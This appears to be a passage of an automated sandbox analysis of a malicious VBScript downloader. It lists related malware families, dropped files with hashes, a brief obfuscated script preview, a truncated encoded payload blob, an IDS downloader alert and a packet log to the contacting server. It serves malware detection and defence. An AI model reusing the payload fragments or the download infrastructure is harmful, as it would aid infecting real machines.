                                                                      • 192.228.108.27

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eMassageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 199.103.62.205
                                                                      New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 199.103.62.205
                                                                      7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                      • 199.103.62.205
                                                                      Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                                      • 199.103.62.205
                                                                      MEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      SecuriteInfo.com.Win32.Malware-gen.5541.4493.exeGet hashmaliciousBabadedaBrowse
                                                                      • 199.103.62.205
                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.103.62.205
                                                                      https://u.to/YaL0IAGet hashmaliciousUnknownBrowse
                                                                      • 199.103.62.205
                                                                      https://warriorplus.com/o2/a/jxwtscv/0Get hashmaliciousUnknownBrowse
                                                                      • 199.103.62.205
                                                                      37f463bf4616ecd445d4a1937da06e19Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      phc.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.103.62.205
                                                                      phc.exeGet hashmaliciousUnknownBrowse
                                                                      • 199.103.62.205
                                                                      001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 199.103.62.205
                                                                      Fignen234.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      Fignen234.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      MEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 199.103.62.205
                                                                      LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 199.103.62.205

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):8003
                                                                      Entropy (8bit):4.840877972214509
                                                                      Encrypted:false
                                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                      MD5:106D01F562D751E62B702803895E93E0
                                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlllultnxj:NllU
                                                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                      Malicious:false
                                                                      Preview:@...e................................................@..........

                                                                      C:\Users\user\AppData\Local\Temp\45-0FIUV

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmdkey.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.121297215059106
                                                                      Encrypted:false
                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddvufo5z.skz.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsrzxlfk.3qw.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xes2drnq.vax.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0brrdti.gro.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Roaming\spgelseshistories.Hov

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):494360
                                                                      Entropy (8bit):5.8776690634795985
                                                                      Encrypted:false
                                                                      SSDEEP:6144:E69gXZ/Utuhrqc0u7CUiKK1NHkrQ9owSIBo4Zuv3UzSDbb2VDXuMxrGHK+mwz86:EbNUtuh7T2U5INmQ9/B1zOn+CqFf6
                                                                      MD5:75819AD2782CC2BAC53D0B9983775B66
                                                                      SHA1:9A4154E44EF74876B2D5EB006D108CCB109006A7
                                                                      SHA-256:94BED04A729D0F20CB480D34FBF0FD570269DF51BD8263B3CA55FA457F007510
                                                                      SHA-512:7D02487E8148671E3C49CEF9746EB0AE66240CA7B7D3723CEA8370E0E5465828E653B0CE21EA79EFD39E7731F55B69FBDFBCA89ED7F8B287D28BE4644B3E06F8
                                                                      Malicious:false
                                                                      Preview:cQGbcQGbu7uLDABxAZvrApKRA1wkBOsCxlFxAZu53LhsKOsCjepxAZuB8Z+wurDrAuy06wJjyYHpQwjWmHEBm3EBm+sC76HrAhRtuh0TMOrrApKY6wKCkesCpRZxAZsxyusCnXTrApxdiRQL6wKAFXEBm9Hi6wLI/HEBm4PBBOsC7+1xAZuB+QXnTQJ8yusCHfnrAh2vi0QkBOsCUArrAiyjicNxAZtxAZuBw5v0twHrAnlVcQGburry+C/rApi46wKoV4HyX3uhtHEBm+sCR8eBwht2pmTrAiHMcQGb6wLm9usC2C/rAjNx6wLFHYsMEOsCIAxxAZuJDBNxAZvrAmsgQnEBm3EBm4H6ADUFAHXVcQGbcQGbiVwkDOsCgZDrAikbge0AAwAA6wKpgnEBm4tUJAhxAZtxAZuLfCQEcQGbcQGbievrAhLjcQGbgcOcAAAA6wIBEHEBm1PrArkFcQGbakBxAZtxAZuJ63EBm+sCtvzHgwABAAAAgF0CcQGb6wLGC4HDAAEAAHEBm+sCDnRTcQGbcQGbievrAoSh6wKv34m7BAEAAHEBm+sCaBuBwwQBAADrAtzucQGbU+sCJLPrAp+rav/rAkiEcQGbg8IFcQGb6wLvwzH26wJmdusCBU8xyesCRLXrAr9VixpxAZvrAiFfQesCy7zrApeTORwKdfJxAZtxAZtG6wJpqOsCYaOAfAr7uHXccQGbcQGbi0QK/OsCbgvrAlBGKfDrAhIr6wKzDP/S6wJFCHEBm7oANQUAcQGbcQGbMcBxAZtxAZuLfCQM6wJge3EBm4E0ByujzWRxAZvrAlXQg8AEcQGb6wLgvjnQdeRxAZvrAsQhifvrAjv5cQGb/9dxAZtxAZsXWyVkK6PNP6JGROEQXDKbk3rcBRWOM5aeXvj+jg0OUWobyOcCZ0bhEFwym34qKN2I3I0PrmFMjalRbXmqSgoqoJRMjWmd2XKvR6td+mSJaSve6kjnIrlpK6aKvCkn

                                                                      Static File Info

                                                                      General

                                                                      File type:ASCII text, with CRLF line terminators
                                                                      Entropy (8bit):5.389092938561215
                                                                      TrID:
                                                                      • Visual Basic Script (13500/0) 100.00%
                                                                      File name:6 654398.vbs
                                                                      File size:26'221 bytes
                                                                      MD5:2270731a281cd40f18f75b69a308207d
                                                                      SHA1:b4d8bc01ca3ef042e7c4839edc21967bd735e1fc
                                                                      SHA256:dbe9edac7d02e3a20e96ae4869966673cfa2505094c3ef06ca1250cffd097f5f
                                                                      SHA512:fd437fc5145402334761e5470c6f3cac2a5938934f278e7e6500b55b38e6a8ecd714040914b196091f3e452ed2e51bf161e11b24b5c284a1a70df4d00efdadb8
                                                                      SSDEEP:384:XrCiOP9v7UpQyrGC0TgSyBamu7fjw7z5E3zn8j1Q:XeDPernxSyBaz7fke3z8j2
                                                                      TLSH:CCC23C6548467FE41EF76BB644453130987C04B2C93980E0690CB427F938BEFAE689FB
                                                                      File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =

                                                                      File Icon

                                                                      Icon Hash:68d69b8f86ab9a86

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-22T15:32:15.637893+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549988199.103.62.205443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 22, 2024 15:31:20.570519924 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:20.570554972 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:20.571019888 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:20.578388929 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:20.578407049 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.406456947 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.406800032 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:21.435338020 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:21.435359955 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.435672998 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.485169888 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:21.594125986 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:21.635337114 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.899041891 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.926378965 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.926397085 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.926431894 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.926450014 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.926464081 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.927054882 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:21.927054882 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:21.927073956 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:21.927335024 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.271048069 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.271061897 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.271101952 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.271233082 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.271249056 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.271332979 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.271332979 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.273503065 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.273520947 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.273646116 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.273655891 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.273727894 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.280181885 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.280209064 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.280380011 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.280391932 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.280447960 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.397528887 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.397563934 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.397876024 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.397897005 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.397977114 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.514872074 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.514897108 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.516192913 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.516218901 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.519978046 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.632448912 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.632472992 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.633579016 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.633596897 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.633872032 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.633989096 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.634006023 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.634337902 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.634345055 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.634443998 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.751749039 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.751775026 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.752501011 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.752523899 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.752593994 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.868544102 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.868568897 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.868779898 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.868794918 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.868911028 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.986107111 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.986174107 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.986257076 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.986275911 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.986332893 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.986332893 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.987704039 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.987756968 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.987903118 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.987903118 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:22.987943888 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:22.988296032 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.105968952 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.105993032 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.106174946 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.106194019 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.106365919 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.222476959 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.222551107 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.222647905 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.222664118 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.222733021 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.222733021 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.339303970 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.339376926 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.339468002 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.339484930 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.339507103 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.339637995 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.340909958 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.340926886 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.341029882 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.341037989 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.341114998 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.457731962 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.457756996 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.457823992 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.457832098 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.457954884 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.457954884 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.459578991 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.459646940 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.459712982 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.459712982 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.459722042 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.460009098 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.576740980 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.576775074 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.577012062 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.577034950 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.577148914 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.692698002 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.692727089 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.692871094 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.692871094 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.692894936 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.692960978 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.694592953 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.694621086 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.694741011 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.694741011 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.694749117 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.694890976 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.810445070 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.810481071 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.810655117 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.810686111 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.810746908 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.812517881 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.812536001 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.812598944 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.812617064 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.812824965 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286140919 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286156893 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286199093 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286461115 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286461115 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286484957 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286624908 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286648035 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286690950 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286690950 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286700010 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286716938 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286839008 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288091898 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288114071 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288162947 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288171053 CEST44349718199.103.62.205192.168.2.5
